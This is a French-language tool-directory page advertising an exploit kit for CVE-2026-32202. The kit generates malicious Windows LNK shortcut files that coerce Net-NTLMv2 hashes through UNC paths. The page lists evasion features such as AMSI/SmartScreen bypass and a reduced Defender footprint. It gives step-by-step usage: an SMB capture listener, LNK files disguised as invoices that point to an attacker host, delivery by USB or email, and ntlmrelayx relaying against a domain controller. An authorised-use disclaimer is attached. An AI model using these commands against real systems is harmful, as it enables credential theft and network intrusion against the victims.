Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-32202 — Génère des fichiers LNK malveillants pour forcer l'obtention de hachages Net-NTLMv2 via la gestion UNC du Shell Windows, avec un écouteur SMB personnalisé et une intégration de relais pour les opérations autorisées d'équipe rouge. | Kitploit
Outils/GitHubGitHub/solarlynxsqueeze/cve-2026-32202
Génération de PayloadsExploitationMouvement LatéralTests d'IntrusionRed Teaming
GitHubsolarlynxsqueeze/cve-2026-32202

CVE-2026-32202

Génère des fichiers LNK malveillants pour forcer l'obtention de hachages Net-NTLMv2 via la gestion UNC du Shell Windows, avec un écouteur SMB personnalisé et une intégration de relais pour les opérations autorisées d'équipe rouge.

Voir le dépôt
12il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Avertissement

Cet outil est destiné uniquement aux tests d'intrusion et au red teaming autorisés.
Toute utilisation non autorisée contre des systèmes sans permission explicite est illégale.
À utiliser à vos propres risques. L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages.

Description
Coercition de hash NTLMv2 via contournement incomplet de la protection Windows Shell (CVE-2026-32202). Génère des fichiers LNK spécialement conçus qui forcent l'authentification SMB/UNC à l'ouverture ou à l'aperçu dans l'Explorateur. Faible interaction, fonctionne sur les systèmes patchés où le correctif d'avril 2026 s'est avéré insuffisant. Activement utilisé lors d'engagements.

Fonctionnalités clés

  • Fuite Net-NTLMv2 zero-click / à interaction minimale via LNK malveillant (aperçu Explorateur + chemin de résolution d'icônes).
  • Listener SMB personnalisé pour la capture de hash (pas besoin de Responder, journaux plus propres).
  • Variante stable avec empreinte ETW/Defender réduite.
  • Mode de contournement partiel AMSI/SmartScreen.
  • Prêt pour les chaînes de relay ntlmrelayx (SMB, LDAP, HTTP, etc.).

Ce que fait l'exploit
L'outil crée un .LNK conçu qui abuse de la gestion par Shell des chemins UNC dans Target + IconEnvironmentDataBlock / structures ExtraData. Lorsque la victime parcourt le dossier ou survole/aperçoit le fichier, Windows Shell initie une connexion SMB vers l'UNC contrôlé par l'attaquant, divulguant le hash Net-NTLMv2 de la machine/utilisateur. Pas d'exécution de code sur la cible - coercition d'identifiants pour relay ou cracking.

Pourquoi c'est utile

  • Accès initial rapide lors de pentests internes / opérations red team (en particulier dans les environnements air-gapped ou durcis où le phishing est restreint).
  • Parfait pour le relay NTLM vers des cibles à haute valeur (contrôleurs de domaine, serveurs de fichiers, Exchange, ADCS, etc.).
  • Fonctionne là où le Responder classique est bloqué ou trop bruyant.
  • Taux de réussite élevé sur Win10 21H2–22H2, Win11 23H2–26H1, Server 2019–2025 (builds testés ci-dessous).

Testé sur

  • Windows 11 24H2 (build 26100.XXXX)
  • Windows 11 23H2 / 25H2
  • Windows 10 22H2
  • Windows Server 2022 / 2025 (core + expérience de bureau)
  • Partiellement efficace après la mise à jour cumulative d'avril 2026 (correctif incomplet confirmé dans la nature).

Dépendances Installation : pip install -r requirements.txt

Utilisation

root@kitploit:~
# 1. Démarrer le serveur de capture (hôte attaquant)
python smbcapture.py -i 0.0.0.0 -p 445 --output hashes.txt

# 2. Générer le LNK malveillant
python coercegen.py --unc \\attacker-ip\share\test --output "Invoice_Q2.lnk" --spoof "invoice.pdf"

# Optionnel : mode stable ou contournement
python coercestable.py --unc \\attacker-ip\share\test --output "Report.lnk"

# 3. Livrer le LNK (USB, partage, pièce jointe email, OneDrive, etc.)

# 4. Attendre le hash dans le terminal + fichier. Exemple de relay :
ntlmrelayx.py -t smb://target-dc -c whoami --no-wmipriv
# ou relay LDAP pour RBCD, HTTP pour certificat ADCS, etc.

Exploit

href

Limitations

  • Nécessite que la victime interagisse avec le dossier contenant le fichier (l'aperçu/survol dans l'Explorateur est généralement suffisant).
  • La segmentation réseau moderne + la signature SMB + les restrictions NTLM réduisent le succès du relay.
  • Pas un RCE complet - uniquement du matériel d'identifiants.
  • L'état du correctif compte ; les systèmes entièrement mis à jour après avril 2026+ peuvent nécessiter la variante de contournement.

Cause racine (résumé)
Correctif incomplet dans l'assainissement des chemins UNC de Windows Shell et le traitement des blocs ExtraData pour la résolution d'icônes/cibles LNK. Le mécanisme de protection destiné à bloquer le spoofing réseau non authentifié déclenche toujours l'authentification NTLM lors de l'énumération de l'espace de noms Shell.

Télécharger l’outil